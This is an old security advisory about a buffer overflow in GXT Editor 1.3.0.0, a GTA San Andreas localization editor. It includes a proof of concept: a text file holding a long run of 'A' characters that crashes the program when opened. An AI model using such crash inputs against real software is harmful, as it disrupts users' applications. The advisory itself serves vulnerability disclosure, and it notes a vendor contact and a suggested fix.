<div align="center">  <div align="left">  <font size="2" face="OCR A Extended"> 
            
            </font> <font size="2" face="Courier New, Courier, mono"> 
            
            <b>GXT Editor Overflow Vulnerability</b><br>
            Reported by basher13 </font></div>
          <p align="left"> 
          <div align="left"> 
            <pre>
<font color="#000000" size="2" face="Courier New, Courier, mono">Update:
1:33 01/08/2005


Subject:
" GXT Editor Overflow Vulnerability "



Vulnerable version:
GXT Editor 1.3.0.0



Operating System:
- WINDOWS 95
- WINDOWS 98
- WINDOWS NT 
- WINDOWS XP



Vendor URL:
Mail - support@GTA3Mods.Com
WWW - www.GTA3Mods.Com





Description:
This program allows you to edit localization files of GTA San Andreas. To display the in-game text in 
many languages GTA uses GXT files which consist of tables with keys and values. When the game wants to 
display some string in just looks for the key in the localization file currently in use and displays its 
associated value, making it seamless to translate the game in multiple languages. 





Vulnerability:
A buffer overflow condition occurs when a very long text string is sent to the program application.
Its say need a send string &#39;A&#39;x5870 or than higher that could make application Overflow.

Run-time Error &#39;6&#39;:
Overflow

A terminate the application is required.



Proof of concept:
Go to directory GXT Editor (C:\Program Files\GTA3Mods - GXT Editor),
then create a file whit any type (*.txt,.htm,).
Use notepad and write any string and save as .txt or any file type ,example :

test.txt

AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Open GXT Editor then navigate to menu file and choose &#39;open&#39; or ctrl+O to open and reading file test.txt.
Choose test.txt and open at directory spesified,(C:\Program Files\GTA3Mods - GXT Editor).




Solution:
Vendor has contacted for this vulnerability.
Another advice is set maxLength txtValue to higher number.




Published by:
basher13 (Infam0us Gr0up - Securiti Research)
basher13@linuxmail.org / infamous.2hell.com
</font></pre>
            <font size="2" face="Courier New, Courier, mono"> 
            
 
          </font> 
          <p>         
            
  </font> </div>